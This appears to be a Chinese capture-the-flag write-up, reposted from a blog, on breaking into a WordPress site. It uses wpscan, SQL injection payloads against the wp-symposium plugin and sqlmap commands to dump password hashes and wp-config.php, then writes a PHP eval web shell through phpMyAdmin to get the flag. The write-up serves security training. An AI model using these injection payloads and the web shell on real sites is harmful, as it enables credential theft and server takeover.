0x00 信息收集
网址是一个wordpress博客。
1 | Apache/2.4.10 (Debian) |
既然是wp,直接用wpscan扫一扫。
123456789101112131415161718 | [+] We found 2 plugins:[+] Name: akismet | Latest version: 3.3.4 | Location: http://218.2.197.234:2040/wp-content/plugins/akismet/[!] We could not determine a version so all vulnerabilities are printed out[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html[i] Fixed in: 3.1.5[+] Name: wp-symposium - v15.1 | Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/ | Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt[!] The version is out of date, the latest version is 15.8.1 |
找到了两个“过气”插件,存在漏洞。
12345678910111213141516171819 | [!] Title: WP Symposium <= 15.1 - SQL Injection Reference: https://wpvulndb.com/vulnerabilities/7902 Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479 Reference: http://packetstormsecurity.com/files/131801/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325 Reference: https://www.exploit-db.com/exploits/37080/[i] Fixed in: 15.4[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8140 Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522 Reference: https://www.exploit-db.com/exploits/37824/[i] Fixed in: 15.8[!] Title: WP Symposium <= 15.1 - Blind SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8148 Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/[i] Fixed in: 15.8 |
0x01 漏洞利用
CVE-2015-3325的sql注入是利用wp-symposium插件中的get_album_item.php。
12345678910 | include_once('../../../wp-config.php'); global $wpdb; $iid = $_REQUEST['iid']; $size = $_REQUEST['size']; $sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d"; $image = $wpdb->get_var($wpdb->prepare($sql, $iid)); header("Content-type: image/jpeg"); echo stripslashes($image);?> |
构造size参数,来进行sql查询,代码也没有过滤,但是在查询列名限制table_name的时候却没有返回,如果不限制table_name,会因为文件大小限制只显示1kb的内容,看不到wp_users的列名。
1 | ?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20-- |
无奈,放弃这个漏洞,看那个盲注的CVE。
https://www.exploit-db.com/exploits/37822/
topic_id参数存在盲注,访问对应页面,将post请求保存到文件中,用sqlmap来测试。(测试的时候没有删掉exp中的sleep函数,导致脚本多跑了好久。。。)
1 | sqlmap -r "E:1.txt" --dbs --level 3 |
12345 | available databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] wordpress |
表名
1 | sqlmap -r "E:1.txt" -D "wordpress" --tables |
12345678910111213141516171819202122232425262728大专栏 Wordpress插件渗透测试an>293031323334353637383940 | Database: wordpress[36 tables]+------------------------------+| wp_commentmeta || wp_comments || wp_links || wp_options || wp_postmeta || wp_posts || wp_symposium_audit || wp_symposium_cats || wp_symposium_chat2 || wp_symposium_chat2_typing || wp_symposium_chat2_users || wp_symposium_comments || wp_symposium_events || wp_symposium_events_bookings || wp_symposium_extended || wp_symposium_following || wp_symposium_friends || wp_symposium_gallery || wp_symposium_gallery_items || wp_symposium_group_members || wp_symposium_groups || wp_symposium_likes || wp_symposium_lounge || wp_symposium_mail || wp_symposium_news || wp_symposium_styles || wp_symposium_subs || wp_symposium_topics || wp_symposium_topics_images || wp_symposium_topics_scores || wp_symposium_usermeta || wp_term_relationships || wp_term_taxonomy || wp_terms || wp_usermeta || wp_users |+------------------------------+ |
列名
1 | sqlmap -r "E:1.txt" -D "wordpress" -T "wp_users" --columns |
1234567891011121314151617 | Database: wordpressTable: wp_users[10 columns]+---------------------+---------------------+| Column | Type |+---------------------+---------------------+| display_name | varchar(250) || ID | bigint(20) unsigned || user_activation_key | varchar(60) || user_email | varchar(100) || user_login | varchar(60) || user_nicename | varchar(50) || user_pass | varchar(64) || user_registered | datetime || user_status | int(11) || user_url | varchar(100) |+---------------------+---------------------+ |
查询内容
1 | sqlmap -r "E:1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump |
12345 | +------------------------------------+| user_pass |+------------------------------------+| $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 |+------------------------------------+ |
用CVE-2015-3325按照对应的表名列名也是能查到管理员。
1 | ?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20-- |
但是数据库中的管理员密码是强加密的,没办法解密。
之前扫到服务器还有一个phpmyadmin网页,可以从这里入手。
用sqlmap扫描phpmyadmin的密码。
1 | sqlmap -r "E:1.txt" --current-user --password |
1234567 | database management system users password hashes:[*] debian-sys-maint [1]: password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4[*] root [1]: password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2[*] wordpress [1]: password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B |
也是没有办法解密。。。
经过表哥提示,直接利用sqlmap读取wp的配置文件。
1 | sqlmap -r "E:1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id" |
成功读取到phpmyadmin的账户密码。
Getshell
登陆到phpmyadmin,通过sql查询语句写入shell。
1 | select '<?php @eval($_POST[adadminn])?>'INTO OUTFILE '/var/www/html/nibuhuicaidao.php'; |
报错:Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)
提示目录不可写。
用dirbuster工具爆破了一下目录,发现还有一个image的目录,测试,发现可写。
1 | select '<?php @eval($_POST[adadminn])?>'INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php'; |
菜刀链接,拿到flagflag{Hi_Web_fLaG_Is_HEre}。
来源:https://www.cnblogs.com/liuzhongrong/p/12263081.html